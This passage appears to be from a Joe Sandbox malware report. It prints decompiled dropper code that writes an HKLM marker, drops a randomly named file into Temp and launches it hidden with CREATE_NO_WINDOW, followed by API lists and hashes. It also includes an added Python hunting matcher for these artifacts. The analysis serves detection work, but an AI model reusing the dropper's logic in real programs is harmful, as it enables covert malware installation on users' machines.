                                                                                						do {
                                                                                							_t181 =  *_t137;
                                                                                							_t137 =  &(_t137[1]);
                                                                                							__eflags = _t181;
                                                                                						} while (_t181 != 0);
                                                                                						_t139 = _t137 - _t173 + 1;
                                                                                						__eflags = _t139;
                                                                                						RegSetValueExA(_v12,  *0x412c38, 0, 1, _t188, _t139);
                                                                                						RegCloseKey(_v12);
                                                                                						goto L35;
                                                                                					}
                                                                                					_t144 = RegQueryValueExA(_v12,  *0x412c38, 0,  &_v28, 0,  &_v16);
                                                                                					__eflags = _t144;
                                                                                					if(_t144 == 0) {
                                                                                						__eflags = _v28 - 1;
                                                                                						if(_v28 == 1) {
                                                                                							__eflags = _v16;
                                                                                							if(_v16 > 0) {
                                                                                								_t147 = E0040EBCC(_v16);
                                                                                								_pop(_t173);
                                                                                								_v8 = _t147;
                                                                                								__eflags = _t147;
                                                                                								if(_t147 != 0) {
                                                                                									_t173 =  &_v16;
                                                                                									_t149 = RegQueryValueExA(_v12,  *0x412c38, 0,  &_v28, _t147,  &_v16);
                                                                                									__eflags = _t149;
                                                                                									if(_t149 != 0) {
                                                                                										E0040EC2E(_v8);
                                                                                										_pop(_t173);
                                                                                										_v8 = 0;
                                                                                									}
                                                                                								}
                                                                                							}
                                                                                						}
                                                                                					}
                                                                                					RegCloseKey(_v12);
                                                                                					__eflags = _v8;
                                                                                					if(_v8 != 0) {
                                                                                						_t146 = E0040EED1(_v8,  *0x412c3c);
                                                                                						_pop(_t173);
                                                                                						__eflags = _t146;
                                                                                						if(_t146 == 0) {
                                                                                							goto L35;
                                                                                						}
                                                                                					}
                                                                                					goto L31;
                                                                                				} else {
                                                                                					_t153 = E004073FF(_t173, 0x410264, 0, 0,  &_v388,  &_v60);
                                                                                					_t199 = _t196 + 0x14;
                                                                                					__eflags = _t153;
                                                                                					if(_t153 <= 0) {
                                                                                						L19:
                                                                                						_t91 = 0;
                                                                                						L56:
                                                                                						return _t91;
                                                                                					}
                                                                                					__eflags = _v388;
                                                                                					if(_v388 == 0) {
                                                                                						goto L19;
                                                                                					}
                                                                                					__eflags = _v60;
                                                                                					if(_v60 == 0) {
                                                                                						goto L19;
                                                                                					} else {
                                                                                						_t154 =  &_v388;
                                                                                						_t181 = _t154 + 1;
                                                                                						do {
                                                                                							_t180 =  *_t154;
                                                                                							_t154 = _t154 + 1;
                                                                                							__eflags = _t180;
                                                                                						} while (_t180 != 0);
                                                                                						_t156 = _t195 + _t154 - _t181 - 0x181;
                                                                                						__eflags =  *_t156 - 0x5c;
                                                                                						if( *_t156 == 0x5c) {
                                                                                							 *_t156 = 0;
                                                                                						}
                                                                                						__eflags =  *0x412159 - 0x60;
                                                                                						if( *0x412159 < 0x60) {
                                                                                							L18:
                                                                                							E0040EE2A(_t180, 0x4122f8, 0, 0x100);
                                                                                							_t196 = _t199 + 0xc;
                                                                                							L37:
                                                                                							_v20 = 0;
                                                                                							_v8 = 0;
                                                                                							__eflags =  *0x4121a8; // 0x0
                                                                                							if(__eflags == 0) {
                                                                                								L42:
                                                                                								__eflags =  *0x412cd8; // 0x0
                                                                                								if(__eflags != 0) {
                                                                                									L46:
                                                                                									_t89 = E00406BA7(0x412cd8);
                                                                                									_pop(_t174);
                                                                                									__eflags = _t89;
                                                                                									if(_t89 == 0) {
                                                                                										L52:
                                                                                										 *0x412cd8 = 0;
                                                                                										L53:
                                                                                										__eflags = _v8;
                                                                                										if(_v8 != 0) {
                                                                                											E0040EC2E(_v8);
                                                                                										}
                                                                                										_t91 = 1;
                                                                                										__eflags = 1;
                                                                                										goto L56;
                                                                                									}
                                                                                									_t93 = E00407E2F(_t181);
                                                                                									__eflags = _t93;
                                                                                									if(_t93 != 0) {
                                                                                										L51:
                                                                                										DeleteFileA(0x412cd8);
                                                                                										goto L52;
                                                                                									}
                                                                                 									// Launch the dropped copy: zeroed STARTUPINFOA (cb = 0x44) and PROCESS_INFORMATION (0x10 bytes),
                                                                                 									// command line = the drop path at 0x412cd8 wrapped in double quotes,
                                                                                 									// dwCreationFlags = 0x08000000 (CREATE_NO_WINDOW), no inherited handles.
                                                                                 									_t193 = 0x44;
                                                                                 									E0040EE2A(_t174,  &_v128, 0, _t193);
                                                                                 									_v128.cb = _t193;
                                                                                 									E0040EE2A(_t174,  &_v44, 0, 0x10);
                                                                                 									_v428 = 0x22; // opening '"'
                                                                                 									lstrcpyA( &_v427, 0x412cd8);
                                                                                 									_t102 = lstrlenA( &_v428);
                                                                                 									 *((char*)(_t195 + _t102 - 0x1a8)) = 0x22; // closing '"' after the copied path
                                                                                 									 *((char*)(_t195 + _t102 - 0x1a7)) = 0; // NUL terminator
                                                                                 									E00407FCF(_t174);
                                                                                 									_t107 = CreateProcessA(0,  &_v428, 0, 0, 0, 0x8000000, 0, 0,  &_v128,  &_v44);
                                                                                 									__eflags = _t107;
                                                                                 									if(_t107 == 0) {
                                                                                 										// launch failed: L51 below DeleteFileA()s the dropped file, then L52 clears the stored path
                                                                                 										E00407EE6(_t174);
                                                                                 										E00407EAD(_t181, __eflags, 0);
                                                                                 										goto L51;
                                                                                 									}
                                                                                 									CloseHandle(_v44.hThread);
                                                                                 									CloseHandle(_v44); // hProcess; the child is left running
                                                                                 									goto L53;
                                                                                								}
                                                                                 								// Build the drop path in the 0x12c-byte buffer at 0x412cd8: GetTempPathA() (returned with its
                                                                                 								// trailing backslash), then (rand() & 3) + 5 = 5..8 random lowercase letters (rand() % 0x1a + 'a'),
                                                                                 								// then an extension decrypted by E00402544 from 0x410694 and appended by E0040EF00 (L45).
                                                                                 								GetTempPathA(0x12c, 0x412cd8);
                                                                                 								_t113 = E00408274(0x412cd8); // write offset = end of the temp path
                                                                                 								_pop(_t177);
                                                                                 								_v24 = _t113;
                                                                                 								_t116 = (E0040ECA5() & 0x00000003) + 5; // E0040ECA5 = the sample's rand()
                                                                                 								_v20 = _t116;
                                                                                 								__eflags = _t116;
                                                                                 								if(_t116 <= 0) {
                                                                                 									L45:
                                                                                 									_t117 = E00402544(0x4122f8, 0x410694, 5, 0xe4, 0xc8); // decrypt the 5-byte extension string
                                                                                 									_t69 = _v24 + 0x412cd8; // 0x0
                                                                                 									E0040EF00(_t69, _t117); // append it after the random letters
                                                                                 									E0040EE2A(_t177, 0x4122f8, 0, 0x100); // clear the 0x100-byte decrypt scratch buffer again
                                                                                 									_t196 = _t196 + 0x28;
                                                                                 									goto L46;
                                                                                 								} else {
                                                                                 									goto L44;
                                                                                 								}
                                                                                 								do {
                                                                                 									L44:
                                                                                 									_t122 = E0040ECA5();
                                                                                 									_t177 = 0x1a;
                                                                                 									_t181 = _t122 % _t177 + 0x61; // 'a' + rand() % 26
                                                                                 									_v24 = _v24 + 1;
                                                                                 									_v20 = _v20 - 1;
                                                                                 									 *((char*)(_v24 + 0x412cd8)) = _t122 % _t177 + 0x61;
                                                                                 									__eflags = _v20;
                                                                                 								} while (_v20 > 0);
                                                                                 								goto L45;
                                                                                							}
                                                                                							_t126 = E0040675C(0x4121a8,  &_v20, 0);
                                                                                							_t196 = _t196 + 0xc;
                                                                                							_v8 = _t126;
                                                                                							__eflags =  *0x4121a8; // 0x0
                                                                                							if(__eflags == 0) {
                                                                                								goto L42;
                                                                                							}
                                                                                							__eflags = _t126;
                                                                                							if(_t126 == 0) {
                                                                                								goto L42;
                                                                                							}
                                                                                							__eflags = _v20 -  *0x4121a4; // 0x0
                                                                                							if(__eflags != 0) {
                                                                                								goto L42;
                                                                                							}
                                                                                							_t128 = E004024C2(_v8, _t127, 0);
                                                                                							_t196 = _t196 + 0xc;
                                                                                							__eflags =  *0x4122d4 - _t128; // 0x0
                                                                                							if(__eflags == 0) {
                                                                                								goto L53;
                                                                                							}
                                                                                							goto L42;
                                                                                						}
                                                                                 						// Installation marker in HKLM (0x80000002): open the key whose name E00402544 decrypts from
                                                                                 						// E00410710 (0x35 bytes), samDesired 0x103 = KEY_QUERY_VALUE | KEY_SET_VALUE | KEY_WOW64_64KEY,
                                                                                 						// then read the value named by _v388. Only a REG_DWORD (type 4) of 4 bytes holding 0 is left
                                                                                 						// untouched (L17); a missing value, other type/size, or non-zero data is rewritten as DWORD 0 (L16).
                                                                                 						// Either way execution continues at L18 (clear the scratch buffer, then the drop/launch logic).
                                                                                 						_t189 = 4; // REG_DWORD, and also the expected data size
                                                                                 						_v8 = 0;
                                                                                 						_v16 = _t189;
                                                                                 						_t159 = E00402544(0x4122f8,  &E00410710, 0x35, 0xe4, 0xc8);
                                                                                 						_t199 = _t199 + 0x14;
                                                                                 						_t160 = RegOpenKeyExA(0x80000002, _t159, 0, 0x103,  &_v12);
                                                                                 						__eflags = _t160;
                                                                                 						if(_t160 != 0) {
                                                                                 							goto L18;
                                                                                 						}
                                                                                 						_t165 = RegQueryValueExA(_v12,  &_v388, 0,  &_v28,  &_v8,  &_v16); // _v28 = type, _v8 = data, _v16 = size
                                                                                 						__eflags = _t165;
                                                                                 						if(_t165 != 0) {
                                                                                 							L16:
                                                                                 							_v8 = 0;
                                                                                 							RegSetValueExA(_v12,  &_v388, 0, _t189,  &_v8, _t189); // (re)write the marker as DWORD 0
                                                                                 							L17:
                                                                                 							RegCloseKey(_v12);
                                                                                 							goto L18;
                                                                                 						}
                                                                                 						__eflags = _v28 - _t189;
                                                                                 						if(_v28 != _t189) { // not REG_DWORD
                                                                                 							goto L16;
                                                                                 						}
                                                                                 						__eflags = _v16 - _t189;
                                                                                 						if(_v16 != _t189) { // not 4 bytes
                                                                                 							goto L16;
                                                                                 						}
                                                                                 						__eflags = _v8;
                                                                                 						if(_v8 == 0) { // already 0: nothing to write
                                                                                 							goto L17;
                                                                                 						}
                                                                                 						goto L16;
                                                                                					}
                                                                                				}
                                                                                			}
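The drop-path generation, the quoted launch command line and the HKLM marker test visible in the decompiled fragment above, re-expressed as an added example for hunting and sandbox triage. This is constructed code, not code from the sample, from Joe Sandbox or from the report. Assumptions: the file extension is decrypted at runtime (E00402544 over 0x410694) and cannot be recovered from this page, so it is a parameter; the temp directory and the event paths are constructed inputs; the sample's rand() (E0040ECA5) is replaced by Python's PRNG, which only matters for the distribution of letters, not for the name shape.

```python
import random
import re

# Constructed example (not the sample's or the report's code): re-expresses the decompiled
# logic above so the dropper's observable artifacts can be matched in file/process/registry events.

CREATE_NO_WINDOW = 0x08000000   # dwCreationFlags the sample passes to CreateProcessA
REG_DWORD = 4                   # type (and size) expected for the HKLM marker value


def example_rng(seed: int = 7) -> random.Random:
    """Seeded stand-in for the sample's rand() (E0040ECA5); an assumption, not its PRNG."""
    return random.Random(seed)


def random_drop_name(rng: random.Random) -> str:
    """5..8 lowercase letters, exactly as the decompiled loop computes them:
    count = (rand() & 3) + 5, each letter = rand() % 0x1a + 0x61 ('a')."""
    count = (rng.getrandbits(32) & 3) + 5
    return "".join(chr(rng.getrandbits(32) % 0x1A + 0x61) for _ in range(count))


def drop_path(temp_dir: str, extension: str, rng: random.Random) -> str:
    """GetTempPathA() result (trailing backslash) + random stem + runtime-decrypted extension.
    `extension` is an assumption: the report does not reveal the decrypted string."""
    if not temp_dir.endswith("\\"):
        temp_dir += "\\"
    return temp_dir + random_drop_name(rng) + extension


def launch_command_line(path: str) -> str:
    """The lpCommandLine the sample builds before CreateProcessA: the drop path in double quotes."""
    return '"' + path + '"'


# Hunting pattern for the basename: exactly 5..8 lowercase ASCII letters, optional extension
# (left open because the real extension is unknown from this page).
DROP_NAME_RE = re.compile(r"^[a-z]{5,8}(\.[A-Za-z0-9]{1,8})?$")


def looks_like_drop_name(path: str) -> bool:
    """True when `path` sits directly in a ...\\Temp directory and its basename fits the generator.
    Intended for file-create / process-create events from sandbox or EDR telemetry."""
    parts = path.replace("/", "\\").rsplit("\\", 1)
    parent = parts[0].lower() if len(parts) == 2 else ""
    name = parts[-1]
    return parent.endswith("\\temp") and DROP_NAME_RE.fullmatch(name) is not None


def marker_needs_reset(query_ok: bool, value_type: int, value_size: int, value_data: int) -> bool:
    """Mirror of the RegQueryValueExA branch: the sample rewrites the value as DWORD 0 (L16)
    unless the query succeeded AND type == REG_DWORD AND size == 4 AND data == 0 (L17)."""
    if not query_ok:
        return True
    if value_type != REG_DWORD or value_size != 4:
        return True
    return value_data != 0


# Constructed event paths (not from the report) to exercise the matcher.
CONSTRUCTED_EVENTS = [
    r"C:\Users\user\AppData\Local\Temp\qwhfke.exe",   # 6 lowercase letters in Temp: matches
    r"C:\Users\user\AppData\Local\Temp\file.exe",     # 4 letters: too short
    r"C:\Windows\Temp\abcdefgh",                      # 8 letters, no extension: matches
    r"C:\Users\user\Downloads\abcdef.exe",            # right shape, wrong directory
]


def flag_events(paths):
    """Return the subset of paths that fit the dropper naming scheme."""
    return [p for p in paths if looks_like_drop_name(p)]


if __name__ == "__main__":
    rng = example_rng()
    p = drop_path(r"C:\Users\user\AppData\Local\Temp", ".exe", rng)
    print(p, launch_command_line(p), hex(CREATE_NO_WINDOW))
    print(flag_events(CONSTRUCTED_EVENTS))
```

The stem regex is deliberately loose on the extension; tighten it once the decrypted string is known from the dropped-file section of the report. A 5-to-8-letter lowercase name under Temp is not unique to this family, so use `looks_like_drop_name` together with the CREATE_NO_WINDOW launch from the same parent and the DWORD-0 value under the decrypted HKLM key rather than on its own.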
(Instruction address column for this function, 0x00408328 through 0x0040877a, not reproduced: in the flattened report it is no longer aligned with the decompiled lines above.)
                                                                                0x004086c5
                                                                                0x004086cc
                                                                                0x004086d8
                                                                                0x004086db
                                                                                0x004086eb
                                                                                0x004086f2
                                                                                0x004086ff
                                                                                0x00408705
                                                                                0x0040870d
                                                                                0x00408714
                                                                                0x00408733
                                                                                0x00408739
                                                                                0x0040873b
                                                                                0x0040874f
                                                                                0x00408755
                                                                                0x00000000
                                                                                0x0040875a
                                                                                0x00408746
                                                                                0x0040874b
                                                                                0x00000000
                                                                                0x0040874b
                                                                                0x0040862c
                                                                                0x00408633
                                                                                0x00408638
                                                                                0x00408639
                                                                                0x00408644
                                                                                0x00408647
                                                                                0x0040864a
                                                                                0x0040864c
                                                                                0x00408671
                                                                                0x00408683
                                                                                0x0040868c
                                                                                0x00408693
                                                                                0x0040869f
                                                                                0x004086a4
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040864e
                                                                                0x0040864e
                                                                                0x0040864e
                                                                                0x00408657
                                                                                0x0040865d
                                                                                0x00408660
                                                                                0x00408663
                                                                                0x00408666
                                                                                0x0040866c
                                                                                0x0040866c
                                                                                0x00000000
                                                                                0x0040864e
                                                                                0x004085da
                                                                                0x004085df
                                                                                0x004085e2
                                                                                0x004085e5
                                                                                0x004085eb
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004085ed
                                                                                0x004085ef
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004085f4
                                                                                0x004085fa
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00408601
                                                                                0x00408606
                                                                                0x00408609
                                                                                0x0040860f
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040860f
                                                                                0x004083c2
                                                                                0x004083df
                                                                                0x004083e2
                                                                                0x004083e5
                                                                                0x004083ea
                                                                                0x004083f3
                                                                                0x004083f9
                                                                                0x004083fb
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00408414
                                                                                0x0040841a
                                                                                0x0040841c
                                                                                0x0040842d
                                                                                0x0040843e
                                                                                0x00408441
                                                                                0x00408447
                                                                                0x0040844a
                                                                                0x00000000
                                                                                0x0040844a
                                                                                0x0040841e
                                                                                0x00408421
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00408423
                                                                                0x00408426
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00408428
                                                                                0x0040842b
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040842b
                                                                                0x0040838d

                                                                                APIs
                                                                                • RegOpenKeyExA.ADVAPI32(80000002,00000000,?,?,00000000,00000103,Function_00010750,?,?,00000000,localcfg,00000000), ref: 004083F3
                                                                                • RegQueryValueExA.ADVAPI32(00410750,?,00000000,?,00408893,?,?,?,00000000,00000103,Function_00010750,?,?,00000000,localcfg,00000000), ref: 00408414
                                                                                • RegSetValueExA.ADVAPI32(00410750,?,00000000,00000004,00408893,00000004,?,?,00000000,00000103,Function_00010750,?,?,00000000,localcfg,00000000), ref: 00408441
                                                                                • RegCloseKey.ADVAPI32(00410750,?,?,00000000,00000103,Function_00010750,?,?,00000000,localcfg,00000000), ref: 0040844A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Value$CloseOpenQuery
                                                                                • String ID: PromptOnSecureDesktop$localcfg
                                                                                • API String ID: 237177642-1678164370
                                                                                • Opcode ID: f0e8bc001febcaf3aa79265d78dfa7c2bcbced2000b5ff9bfcb5f44e60df388c
                                                                                • Instruction ID: 84ba07e5042139a9063b988de9b3f7486f2cd5d6c0453319c527b22e45c4d953
                                                                                • Opcode Fuzzy Hash: f0e8bc001febcaf3aa79265d78dfa7c2bcbced2000b5ff9bfcb5f44e60df388c
                                                                                • Instruction Fuzzy Hash: DAC1D2B1D00109BEEB11ABA0DE85EEF7BBCEB04304F14447FF544B2191EA794E948B69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 54%
                                                                                			E0040199C(void* __eax) {
                                                                                				long _v8;
                                                                                				_Unknown_base(*)()* _v12;
                                                                                				struct HINSTANCE__* _v16;
                                                                                				char _v20;
                                                                                				void* _v24;
                                                                                				long _v28;
                                                                                				_Unknown_base(*)()* _t30;
                                                                                				intOrPtr _t32;
                                                                                				void* _t34;
                                                                                				void* _t41;
                                                                                				struct HINSTANCE__* _t48;
                                                                                				_Unknown_base(*)()* _t49;
                                                                                				void* _t50;
                                                                                
                                                                                				_v20 = 0;
                                                                                				_v28 = 0;
                                                                                				__imp__#11("123.45.67.89");
                                                                                				_v24 = __eax;
                                                                                				_t48 = LoadLibraryA("Iphlpapi.dll");
                                                                                				_v16 = _t48;
                                                                                				if(_t48 != 0) {
                                                                                					_v12 = GetProcAddress(_t48, "GetAdaptersInfo");
                                                                                					_t49 = GetProcAddress(_t48, "GetIfEntry");
                                                                                					_t30 = GetProcAddress(_v16, "GetBestInterface");
                                                                                					if(_v12 == 0 || _t49 == 0 || _t30 == 0) {
                                                                                						FreeLibrary(_v16);
                                                                                						goto L21;
                                                                                					} else {
                                                                                						 *_t30(_v24,  &_v20);
                                                                                						_t34 = GetProcessHeap();
                                                                                						_v24 = _t34;
                                                                                						if(_t34 == 0) {
                                                                                							L21:
                                                                                							_t32 = 0;
                                                                                							L22:
                                                                                							return _t32;
                                                                                						}
                                                                                						_t50 = HeapAlloc(_t34, 0, 0x288);
                                                                                						if(_t50 == 0) {
                                                                                							goto L21;
                                                                                						}
                                                                                						_push( &_v8);
                                                                                						_push(_t50);
                                                                                						_v8 = 0x288;
                                                                                						if(_v12() == 0x6f) {
                                                                                							_t50 = HeapReAlloc(_v24, 0, _t50, _v8);
                                                                                						}
                                                                                						if(_t50 == 0) {
                                                                                							L18:
                                                                                							FreeLibrary(_v16);
                                                                                							if(_v28 == 0) {
                                                                                								goto L21;
                                                                                							}
                                                                                							_t32 = 1;
                                                                                							goto L22;
                                                                                						} else {
                                                                                							_push( &_v8);
                                                                                							_push(_t50);
                                                                                							if(_v12() != 0) {
                                                                                								goto L18;
                                                                                							}
                                                                                							_t41 = _t50;
                                                                                							while( *((intOrPtr*)(_t41 + 0x19c)) != _v20) {
                                                                                								_t41 =  *_t41;
                                                                                								if(_t41 != 0) {
                                                                                									continue;
                                                                                								}
                                                                                								L17:
                                                                                								HeapFree(_v24, 0, _t50);
                                                                                								goto L18;
                                                                                							}
                                                                                							if( *((intOrPtr*)(_t41 + 0x1a0)) != 6) {
                                                                                								_v28 = 1;
                                                                                							}
                                                                                							goto L17;
                                                                                						}
                                                                                					}
                                                                                				}
                                                                                				return 0;
                                                                                			}


                                                                                APIs
                                                                                • inet_addr.WS2_32(123.45.67.89), ref: 004019B1
                                                                                • LoadLibraryA.KERNEL32(Iphlpapi.dll,?,?,?,?,00000001,00401E9E), ref: 004019BF
                                                                                • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 004019E2
                                                                                • GetProcAddress.KERNEL32(00000000,GetIfEntry), ref: 004019ED
                                                                                • GetProcAddress.KERNEL32(?,GetBestInterface), ref: 004019F9
                                                                                • GetProcessHeap.KERNEL32(?,?,?,?,00000001,00401E9E), ref: 00401A1D
                                                                                • HeapAlloc.KERNEL32(00000000,00000000,00000288,?,?,?,?,00000001,00401E9E), ref: 00401A36
                                                                                • HeapReAlloc.KERNEL32(?,00000000,00000000,00401E9E,?,?,?,?,00000001,00401E9E), ref: 00401A5A
                                                                                • HeapFree.KERNEL32(?,00000000,00000000,?,?,?,?,00000001,00401E9E), ref: 00401A9B
                                                                                • FreeLibrary.KERNEL32(?,?,?,?,?,00000001,00401E9E), ref: 00401AA4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Heap$AddressProc$AllocFreeLibrary$LoadProcessinet_addr
                                                                                • String ID: 123.45.67.89$GetAdaptersInfo$GetBestInterface$GetIfEntry$Iphlpapi.dll$localcfg
                                                                                • API String ID: 835516345-270533642
                                                                                • Opcode ID: 52436911476c130446cd143f44c65522dc478156bb7ce270366fd521237d2269
                                                                                • Instruction ID: c689a3d9ae3379b0bfe51822f68a21815d588b76a9689f39126eb657c90dfffc
                                                                                • Opcode Fuzzy Hash: 52436911476c130446cd143f44c65522dc478156bb7ce270366fd521237d2269
                                                                                • Instruction Fuzzy Hash: 39313E32A01219AFCF119FE4DD888AFBBB9EB45311B24457BE501B2260D7B94E819F58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • RegOpenKeyExA.ADVAPI32(80000002,00000000,?,?,00000000,00000103,?), ref: 0208865A
                                                                                • RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00000000,00000103,?), ref: 0208867B
                                                                                • RegSetValueExA.ADVAPI32(?,?,00000000,00000004,?,00000004,?,?,00000000,00000103,?), ref: 020886A8
                                                                                • RegCloseKey.ADVAPI32(?,?,?,00000000,00000103,?), ref: 020886B1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2080000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Value$CloseOpenQuery
                                                                                • String ID: "$PromptOnSecureDesktop
                                                                                • API String ID: 237177642-3108538426
                                                                                • Opcode ID: 1c60b81768065cc7cafd43d65e6870f876b06d8eccb24c6c2cb771a703b3980a
                                                                                • Instruction ID: bc47f7fb476407937a73f3e942d2dbb13ee43b126af854ff649f120592a1976a
                                                                                • Opcode Fuzzy Hash: 1c60b81768065cc7cafd43d65e6870f876b06d8eccb24c6c2cb771a703b3980a
                                                                                • Instruction Fuzzy Hash: A6C1A37190034DBEEB52BBA4DD84EEF7BBDEB04300F548065F685E2050E7B04A94AF65
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • ShellExecuteExW.SHELL32(?), ref: 02081601
                                                                                • lstrlenW.KERNEL32(-00000003), ref: 020817D8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2080000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExecuteShelllstrlen
                                                                                • String ID: $<$@$D
                                                                                • API String ID: 1628651668-1974347203
                                                                                • Opcode ID: 03adf1138caabce6029c68f91071d7d17f6d9527f2eb0b017a6edce7519f1441
                                                                                • Instruction ID: 0f6bd7a36943a8d09cdd4f973a34866938da563235029bb0c1e0df911e7ca785
                                                                                • Opcode Fuzzy Hash: 03adf1138caabce6029c68f91071d7d17f6d9527f2eb0b017a6edce7519f1441
                                                                                • Instruction Fuzzy Hash: 35F168B15083419FD721EF64C888BABBBE5FF88304F00892DF6DA97290D7B49945CB56
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • RegOpenKeyExA.ADVAPI32(80000002,00000000,00020119,?), ref: 020876D9
                                                                                • RegOpenKeyExA.ADVAPI32(?,?,00000000,00000101,?), ref: 02087757
                                                                                • RegQueryValueExA.ADVAPI32(?,00000000,?,00000000,?,?,00000104), ref: 0208778F
                                                                                • ___ascii_stricmp.LIBCMT ref: 020878B4
                                                                                • RegCloseKey.ADVAPI32(?), ref: 0208794E
                                                                                • RegEnumKeyA.ADVAPI32(?,00000000,?,00000104), ref: 0208796D
                                                                                • RegCloseKey.ADVAPI32(?), ref: 0208797E
                                                                                • RegCloseKey.ADVAPI32(?), ref: 020879AC
                                                                                • RegCloseKey.ADVAPI32(?), ref: 02087A56
                                                                                  • Part of subcall function 0208F40C: lstrlen.KERNEL32(000000E4,00000000,PromptOnSecureDesktop,000000E4,0208772A,?), ref: 0208F414
                                                                                • GetFileAttributesExA.KERNEL32(00000022,00000000,?), ref: 020879F6
                                                                                • RegCloseKey.ADVAPI32(?), ref: 02087A4D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2080000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Close$Open$AttributesEnumFileQueryValue___ascii_stricmplstrlen
                                                                                • String ID: "$PromptOnSecureDesktop
                                                                                • API String ID: 3433985886-3108538426
                                                                                • Opcode ID: 1023eff4b56b9a7853b73631c2f3480fec1a45e58b56effd08988566cadd104d
                                                                                • Instruction ID: 603c553e287cb5a6f6b7337978acb837deb77f8555097ea9a8dff60121f7eb62
                                                                                • Opcode Fuzzy Hash: 1023eff4b56b9a7853b73631c2f3480fec1a45e58b56effd08988566cadd104d
                                                                                • Instruction Fuzzy Hash: F1C1B675900319AFDB12ABA4DC44FEFBBB9EF49310F2440A5E584E6164EB71DA80DF60
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 02082CED
                                                                                • socket.WS2_32(00000002,00000002,00000011), ref: 02082D07
                                                                                • htons.WS2_32(00000000), ref: 02082D42
                                                                                • select.WS2_32 ref: 02082D8F
                                                                                • recv.WS2_32(?,00000000,00001000,00000000), ref: 02082DB1
                                                                                • GetProcessHeap.KERNEL32(00000000,00000108), ref: 02082E62
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2080000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Heap$AllocateProcesshtonsrecvselectsocket
                                                                                • String ID:
                                                                                • API String ID: 127016686-0
                                                                                • Opcode ID: 34b12e3987a7911b0151bc10fc282e4d0fd91c502d2533c711cf9584e7c9b6b6
                                                                                • Instruction ID: e6a871217094e9b3b903aa19e4cc1c22140071cf43365d648cdeb6415f53aa08
                                                                                • Opcode Fuzzy Hash: 34b12e3987a7911b0151bc10fc282e4d0fd91c502d2533c711cf9584e7c9b6b6
                                                                                • Instruction Fuzzy Hash: 0161D072504385AFC321BF64DC08BABBBE8EB48745F004819FDC497251D7B5D880EBAA
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 96%
                                                                                			E0040AD89(void* __ecx, void* __eflags) {
                                                                                				signed int _t48;
                                                                                				signed int _t50;
                                                                                				void* _t53;
                                                                                				intOrPtr _t55;
                                                                                				void* _t76;
                                                                                				signed int _t77;
                                                                                				void* _t81;
                                                                                				CHAR* _t92;
                                                                                				void* _t94;
                                                                                				void* _t96;
                                                                                				void* _t98;
                                                                                
                                                                                				_t76 = __ecx;
                                                                                				_t94 = _t96 - 0x74;
                                                                                				// Timestamp that ends up in every generated header: a FILETIME at _t94+0x64
                                                                                				// (dwLowDateTime at +0x64, dwHighDateTime at +0x68). GetLocalTime, not
                                                                                				// GetSystemTime, so the value is in the infected host's local time.
                                                                                				GetLocalTime(_t94 + 0x50);
                                                                                				SystemTimeToFileTime(_t94 + 0x50, _t94 + 0x64);
                                                                                				// 0x80-byte host name buffer at _t94-0x110: zeroed, then filled by the
                                                                                				// subcall at 0040AD08 (gethostname with an lstrcpyA "LocalHost" fallback,
                                                                                				// per the API list below).
                                                                                				E0040EE2A(_t76, _t94 - 0x110, 0, 0x80);
